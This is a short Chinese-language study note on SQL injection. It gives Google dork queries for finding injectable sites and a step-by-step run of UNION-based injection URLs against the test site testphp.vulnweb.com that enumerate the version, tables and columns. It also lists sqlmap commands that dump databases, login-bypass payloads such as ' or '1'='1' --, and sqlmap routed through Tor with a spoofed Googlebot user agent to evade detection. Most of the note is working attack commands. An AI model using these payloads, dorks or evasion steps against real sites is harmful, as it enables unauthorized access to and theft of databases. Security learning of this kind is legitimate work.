sql注入学习简单记录

参考文章

参考学习:http://bbs.pediy.com/thread-218235.htm

Google search:
inurl:"products.php?prodID="

inurl:buy.php?category=

http://testphp.vulnweb.com/listproducts.php?cat=1

http://testphp.vulnweb.com/listproducts.php?cat='

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

有时服务器不能直接理解@@ version命令,需要转换它。您将需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替换@@版本。

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

SQL注入攻击的类型
经典SQLI
盲注或推断SQL注入数据库管理系统
特定的SQLI
复合SQLI
SQL注入+认证不足
SQL注入+ DDoS 攻击
SQL注入+ DNS劫持
SQL注入+ XSS

错误过滤的转义字符

当用户输入未针对转义字符 进行过滤时,会发生这种形式的SQL注入 ,然后将其传递到SQL语句
statement = "SELECT*FROM users WHERE name ='" + userName + "';"

使用注释甚至阻止查询的其余部分(有三种类型的SQL注释)。所有三行最后都有一个空格:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*

http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

apt-get instal tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5

伪装成Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

你可能感兴趣的:(sql注入学习简单记录)